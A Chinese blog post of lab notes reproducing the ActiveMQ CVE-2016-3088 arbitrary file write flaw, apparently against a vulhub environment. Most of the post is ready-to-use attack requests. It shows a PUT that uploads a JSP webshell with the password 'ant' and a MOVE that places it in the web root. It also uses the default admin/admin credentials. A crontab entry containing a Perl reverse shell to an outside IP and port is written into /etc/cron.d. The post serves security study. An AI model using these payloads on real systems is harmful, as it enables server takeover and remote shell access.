ActiveMQ 任意文件写入漏洞(CVE-2016-3088)

最新推荐文章于 2024-10-31 11:37:05 发布
最新推荐文章于 2024-10-31 11:37:05 发布
阅读量274 收藏
点赞数
分类专栏: 漏洞复现笔记 文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45957998/article/details/127363081
版权

ActiveMQ 任意文件写入漏洞(CVE-2016-3088)

https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md

影响范围:ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0;版本以后,彻底删除了fileserver应用。

默认密码:admin/admin

getshell
利用webshell

查看默认路径

http://your-ip:8161/admin/test/systemProperties.jsp
	activemq.home	/opt/activemq
http://your-ip:8161/admin/test/

exp

上传webshell(密码:ant)

PUT /fileserver/xbb.txt HTTP/1.1
Host: 192.168.225.134:8161
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: 120976
Content-Length: 1186

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
%>
<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
    }
%>

访问http://192.168.225.134:8161/fileserver/xbb.txt看一下是否成功

移动webshell

MOVE /fileserver/xbb.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/xbb.jsp
Host: 192.168.225.134:8161
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: 0

访问查看是否成功

使用值登录

Authorization: Basic YWRtaW46YWRtaW4=
利用crontab反弹shell
PUT /fileserver/xbb.txt HTTP/1.1
Host: 192.168.225.134:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: closes
Content-Length: 248

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="106.15.181.34";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

MOVE /fileserver/xbb.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 192.168.225.134:8161
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: 0



cron.d文件详解
https://blog.51cto.com/u_13886444/2317402
查看cron执行历史
tail -f /var/log/cron
小白奋斗ing(小破站)
关注
专栏目录
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088
qq_51577576的博客
09-18 1338
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞
雷根瓦尔德
11-08 1843
Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。 本篇的内容是完成ActiveMQ任意文件写入漏洞CVE-2016-3088ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 本篇我就先进行一次完整的实验过程,然后再按照...
ActiveMQ任意文件写入漏洞CVE-2016-3088
weixin_44311721的博客
08-03 1571
ActiveMQ任意文件写入漏洞CVE-2016-3088ActiveMQ介绍: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。什么是:消息中间件 漏洞简介: ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,ap...
Apache ActiveMQ任意文件写入代码执行漏洞复现(CVE-2016-3088)
DaWan
09-22 502
Apache ActiveMQ任意文件写入代码执行漏洞复现(CVE-2016-3088)环境搭建漏洞验证 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 漏洞验证 将文件上传使用PUT方法放到fileserver目录下,服务器响应204即代码上传成功。 将刚刚上传的文件MOVE到admin或api应用中,但是这两个应用都需要登录才能访问到 登录后访问 下面这个方法更稳定一些,可以在fileserver目录下写入如下内容: */1 * * * * root /usr/bin
CVE-2016-3088ActiveMQ任意文件写入漏洞
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1654
漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞
ActiveMQ 任意文件写入漏洞CVE-2016-3088)复现
qq_40708881的博客
12-12 2895
ActiveMQ 任意文件写入漏洞CVE-2016-3088)复现 导语 ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺
ActiveMQ CVE-2016-3088 分析
示例和笔记
06-07 1878
ActiveMQ是一种流行的开源消息队列软件,支持多种通信协议,并且广泛应用于企业级应用中。其版本1.0到5.14.0存在一个任意文件写入漏洞CVE-2016-3088),攻击者可以利用该漏洞ActiveMQ服务器上的任意位置写入恶意文件,从而导致服务器被入侵控制。ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3133
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
ActiveMQ任意文件写入漏洞 CVE-2016-3088-Vulnhub复现漏洞
m0_55563900的博客
07-02 290
ActiveMQ任意文件写入漏洞CVE-2016-3088) Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md 背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fil
CVE-2016-3088 ActiveMQ漏洞复现
zwj101010101010的博客
07-27 744
这个漏洞出现在fileserver应用中,原理就是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。4、因为fileserver不解析,所以还需要使用MOVE请求来移动上传文件,移动的路径为/opt/activemq/webapps/api/,回显204成功。写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。3、然后将GET修改为PUT,并在目录后加入想上传的数据包。...
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞CVE-2016-3088
JiangBuLiu的博客
06-27 1870
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
m_ing
07-18 1531
漏洞详情 漏洞说明# Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。 漏洞危害# 使远程攻击者用恶意代码替代Web应用,
ActiveMQ漏洞( CVE-2016-3088) 验证
wishpopo的专栏
02-09 6309
注:学习记录   完成文件上传,文件mv  参考学习网址:http://www.lofter.com/tag/CVE-2016-3088 官方描述:http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt CVE-2016-3088 - ActiveMQ Fileserver we
Apache ActiveMQ漏洞利用总结
qq_42430287的博客
04-24 1935
Apache ActiveMQ漏洞利用总结
ActiveMQ漏洞CVE-2016-3088)利用总结
cj_Hydra's Blog
06-23 1515
前言: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveM
ActiveMQ FileServer漏洞(详细)
weixin_30498921的博客
06-23 617
半个月前,巡检时发现服务器出现不明进程,对其进行了处理,由于当时没有做详细记录,在这里把大致过程描述一下. 症状: ps命令发现出现几个不明进程,   1.于/tmp下运行的,名称随机的进程.占用CPU高达100%,确认为挖矿机   2.于activemq下运行的不明进程,占用CPU很低,kill -9 杀死进程后会自动重启(当时以为是activemq的正常进程,后核对后发现该进程不属于a...
快速找出网站中可能存在的XSS漏洞
hackzkaq的博客
05-19 2652
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:汤青松 地址:https://zhuanlan.zhihu.com/p/42604854 一、背景 在本篇文章当中会一permeate生态测试系统为例,参考文档:利用PHP扩展Taint找出网站的潜在安全漏洞实践 二、漏洞简介 在实践漏洞之前,先简单介绍一下XSS漏洞,不过XSS的相关概念介绍并不是本文的重点,因此不会过多细讲; 如果原理都懂,可以直接跳过往下翻至第三节 XSS的漏洞类型主要分为三类:反射型、存储型、DOM型 2.1 漏洞成因 XSS的
漏洞复现----18、AppWeb 身份验证绕过漏洞 (CVE-2018-8715)
七天
06-25 702
文章目录一、简介二、漏洞复现 一、简介 AppWeb 是基于开源 GPL 协议的嵌入式 Web 服务器,由 Embedthis Software LLC 开发和维护。它是用 C/C++ 编写的,几乎可以在任何现代操作系统上运行。它旨在为嵌入式设备提供一个 Web 应用程序容器。 AppWeb可以配置认证,包括以下三种认证方式: 1、basic:传统的HTTP基本认证; 2、digest:改进了 HTTP 基本身份验证。在此模式下,Cookie 将用于身份验证而不是Authorization标头; 3、f
如何正确进行activemq服务搭建及性能调优?
最新发布
梦在硅谷的博客
10-31 921
ActiveMQ是Apache软件基金会开发的一个开源消息代理,支持多种消息协议,包括JMS(Java Message Service)、AMQP、MQTT等。它提供了可靠的消息传递、持久性、事务支持等功能。
CVE-2016-3088复现
07-28
CVE-2016-3088是一个存在于fileserver应用中的漏洞,其原理是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。\[1\] 要复现该漏洞,可以按照以下步骤进行操作: 1. 首先,需要将shell文件移动到具有解析权限的目录中。可以使用MOVE方式将shell移动到/opt/activemq/webapps/api/目录中,如果返回包返回204,则表示移动成功。\[2\] 2. 漏洞环境需要使用centos、docker、docker-compose、vulhub。启动服务后,可以使用命令docker ps来查看服务端口。\[3\] 3. 写入webshell需要将其写入admin或api应用中,而这两个应用都需要登录才能访问。 4. 首先访问http://服务器ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径。 5. 进入http://服务器ip:8161/fileserver,进行抓包。 6. 将GET请求修改为PUT,并在目录后加入想要上传的数据包。如果回显为204,则表示上传成功。 以上是复现CVE-2016-3088漏洞的步骤。请注意,这个漏洞已经被修复,建议及时更新相关软件以避免安全风险。 #### 引用[.reference_title] - *1* *3* [CVE-2016-3088 ActiveMQ漏洞复现](https://blog.csdn.net/zwj101010101010/article/details/126018390)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [ActiveMQ任意文件写入漏洞CVE-2016-3088)复现](https://blog.csdn.net/weixin_38160576/article/details/121494757)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白奋斗ing(小破站)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值